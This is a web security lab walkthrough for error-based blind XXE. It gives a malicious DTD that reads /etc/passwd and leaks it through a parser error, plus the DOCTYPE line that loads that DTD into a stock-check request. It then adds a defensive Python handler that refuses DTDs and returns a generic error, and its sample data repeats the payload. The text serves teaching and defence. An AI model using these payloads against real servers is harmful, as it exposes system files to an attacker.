Click "Go to exploit server" and save the following malicious DTD file on your server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
When imported, this page will read the contents of /etc/passwd into the file entity, and then try to use that entity in a file path.
Click "View exploit" and take a note of the URL for your malicious DTD.
You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Insert the following external entity definition in between the XML declaration and the stockCheck element:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
You should see an error message containing the contents of the /etc/passwd file.
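From the defender's side, the attack above needs two things: a parser that accepts a DOCTYPE in the request body, and an error response that echoes parser detail. The following sketch of a stock-check handler removes both. It is an added example, not the lab's own code; the `productId` and `storeId` field names, the handler names and the sample bodies are assumptions constructed for illustration.

```python
import xml.parsers.expat as expat

GENERIC_ERROR = "Invalid stock check request"  # never echo parser errors to the client

class RejectedXML(Exception):
    """Raised for any request body the stock checker refuses to process."""

def parse_stock_check(body: bytes) -> dict:
    fields, stack, text = {}, [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # A stock check never needs a DTD, so any DOCTYPE is refused
        # before its internal subset is processed.
        raise RejectedXML("DOCTYPE not allowed")

    def on_start(name, attrs):
        stack.append(name)
        text.clear()

    def on_end(name):
        # Keep only direct children of <stockCheck>.
        if len(stack) == 2 and stack[0] == "stockCheck":
            fields[name] = "".join(text).strip()
        stack.pop()

    parser = expat.ParserCreate()
    # Defence in depth: never expand parameter entities or external subsets.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        raise RejectedXML("malformed XML") from exc
    return fields

def handle_request(body: bytes):
    """Return (status, message); every failure gets the same generic message."""
    try:
        fields = parse_stock_check(body)
        product, store = int(fields["productId"]), int(fields["storeId"])
    except (RejectedXML, KeyError, ValueError):
        return 400, GENERIC_ERROR
    return 200, f"stock lookup for product {product} in store {store}"

# Constructed sample bodies: a normal request, and one carrying the DOCTYPE from the steps above.
HEADER = b'<?xml version="1.0" encoding="UTF-8"?>'
ROOT = b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
BENIGN = HEADER + ROOT
WITH_DOCTYPE = HEADER + b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>' + ROOT
```

Because every rejection path returns the same fixed string, a parser error that contains file contents has no route back to the client.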